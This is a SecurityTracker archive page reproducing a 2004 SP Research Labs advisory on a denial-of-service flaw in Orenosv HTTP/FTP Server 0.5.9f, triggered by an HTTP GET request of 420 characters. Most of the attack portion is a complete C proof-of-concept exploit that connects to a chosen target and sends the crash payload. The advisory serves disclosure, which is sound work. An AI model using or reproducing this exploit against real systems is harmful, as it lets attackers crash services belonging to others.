Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Orenosv HTTP/FTP Server Can Be Crashed By Remote Users
|
|
SecurityTracker Alert ID: 1010289
|
|
SecurityTracker URL: http://securitytracker.com/id?1010289
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 26 2004
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Advisory: SP Research Labs
|
Version(s): 0.5.9f
|
Description: badpack3t of SP Research Labs reported a vulnerability in Orenosv Server. A remote user can cause the web and FTP service to stop responding.
It is reported that a remote user can send a specially crafted HTTP GET request for a resource of 420 characters to cause the HTTP
service and the FTP service to stop processing traffic.
A demonstration exploit is provided in the Source Message.
The original
advisory is available at:
http://security-protocols.com/modules.php?name=News&file=article&sid=1987
|
Impact: A remote user can cause the application to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: hp.vector.co.jp/authors/VA027031/orenosv/index_en.html (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (NT), Windows (2000), Windows (XP)
|
Reported By: badpack3t <badpack3t@security-protocols.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 25 May 2004 23:48:52 -0400 (EDT)
From: badpack3t <badpack3t@security-protocols.com>
Subject: Orenosv HTTP/FTP Server Denial Of Service
|
This is a multi-part message in MIME format.
--------------080903010107000907060809
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Please publish:
http://security-protocols.com/modules.php?name=News&file=article&sid=1987
Or the attached advisory.
Thanks,
----------------------------------------
badpack3t
www.security-protocols.com
----------------------------------------
--------------080903010107000907060809
Content-Type: text/plain;
name="sp-x13-advisory.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="sp-x13-advisory.txt"
SP Research Labs Advisory x13
-----------------------------
Orenosv HTTP/FTP Server Denial Of Service
-----------------------------------------
Versions:
orenosv059f
Vendor:
http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html
Date Released - 5.25.2004
------------------------------------
Product Description from the vendor:
Orenosv is an HTTP/FTP/FTPS server running on Windows NT 4.0, Windows 2000 and Windows XP platforms.
Orenosv is a freely distributable software.
--------
Details:
A specifically crafted HTTP GET request which contains 420 A's will cause the HTTP and FTP service
to stop responding.
--------
Exploit:
Attached to this advisory is very basic PoC code which only causes the orenosv service to crash.
--------------
Tested on:
WindowsXP SP1
peace out,
--------------------------
badpack3t
www.security-protocols.com
--------------------------
/****************************/
PoC to crash the server
/****************************/
/* Orenosv HTTP/FTP Server Denial Of Service
Version:
orenosv059f
Vendor:
http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html
Coded and Discovered by:
badpack3t <badpack3t@security-protocols.com>
.:sp research labs:.
www.security-protocols.com
5.25.2004
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
/* 420 A's - looks ugly but owell */
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n";
int main(int argc, char *argv[])
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf("Orenosv HTTP/FTP Server DoS by badpack3t\r\n\r\n", argv[0]);
printf("Usage:\r\n %s <targetip> [targetport] (default is 9999)\r\n\r\n", argv[0]);
printf("www.security-protocols.com\r\n\r\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 9999;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Sending Payload...\n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload\r\n");
closesocket(mysocket);
exit(1);
}
printf("Payload has been sent! Check if the webserver is dead.\r\n");
closesocket(mysocket);
WSACleanup();
return 0;
--------------080903010107000907060809--
|
|
Go to the Top of This SecurityTracker Archive Page
|
